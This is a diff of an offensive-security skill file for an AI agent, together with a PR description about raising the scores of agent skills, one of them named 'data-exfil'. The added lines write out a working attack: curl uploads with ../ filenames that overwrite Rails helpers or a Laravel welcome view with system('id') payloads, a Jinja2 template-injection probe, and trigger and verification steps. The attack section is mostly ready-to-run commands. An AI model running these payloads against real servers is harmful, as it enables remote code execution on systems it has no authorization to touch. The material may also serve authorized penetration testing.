+# Zeitwerk autoload paths: app/controllers/, app/models/, app/helpers/, lib/
+# Write a controller that executes on load
+echo 'system("id > /tmp/pwned.txt")' > payload.rb
+curl -x localhost:8080 -k "https://target.com/upload" \
+  -F "file=@payload.rb;filename=../../../app/helpers/exploit_helper.rb"
+# Trigger: any request that loads helpers (most routes)
+```
+
+#### Laravel (Blade)
+```bash
+# View resolution: resources/views/{name}.blade.php
+echo '{!! system("id") !!}' > payload.blade.php
+curl -x localhost:8080 -k "https://target.com/upload" \
+  -F "file=@payload.blade.php;filename=../resources/views/welcome.blade.php"
+# Trigger: visit / (default welcome route)
+```
+
+#### Django/Flask (Jinja2)
+```bash
+# Template dirs: templates/
+echo '{{ "".__class__.__mro__[1].__subclasses__() }}' > payload.html
+# Use this to enumerate classes, then find os.popen or subprocess for RCE
+```
+
+### 4. Trigger resolution and verify execution
+```bash
+# Trigger the route that renders the overwritten template
+curl -x localhost:8080 -k "https://target.com/target-route"
+
+# Verify execution via OOB callback or file creation
+curl -x localhost:8080 -k "https://target.com/out.txt"
+```
+
+**Checkpoint:** Confirm execution with a benign command (whoami, id) or OOB callback. Do not proceed with destructive payloads until execution is confirmed.
+
+## Detection Signals
+```bash
+# Error messages disclosing view search paths
+rg "ViewEngine|Could not find view|template not found" http_requests/
+
+# Framework file lookups (if you have strace/procmon access)
+strace -e trace=open,openat -p <pid> 2>&1 | grep -i "views\|templates"
+```
 
 ## Chain With
 - `apache-confusion-attacks`


### PR DESCRIPTION
Rewrote lowest-scoring skills (data-exfil 18%→90%, scorer-reference 61%→86%, dom-vulnerability-* 71%→97%, hackerone-recon 74%→97%, vuln-kb 75%→100%).

Common fixes: allowed-tools array→string, added Use-when clauses, removed verbose explanations of concepts the agent already knows, replaced pseudocode with executable rg/curl/grep commands, added validation checkpoints to workflows, cut monolithic files to essentials.

28 skills improved, average score 86%→92% across all 58 skills.

superseeds #22 (conflicts)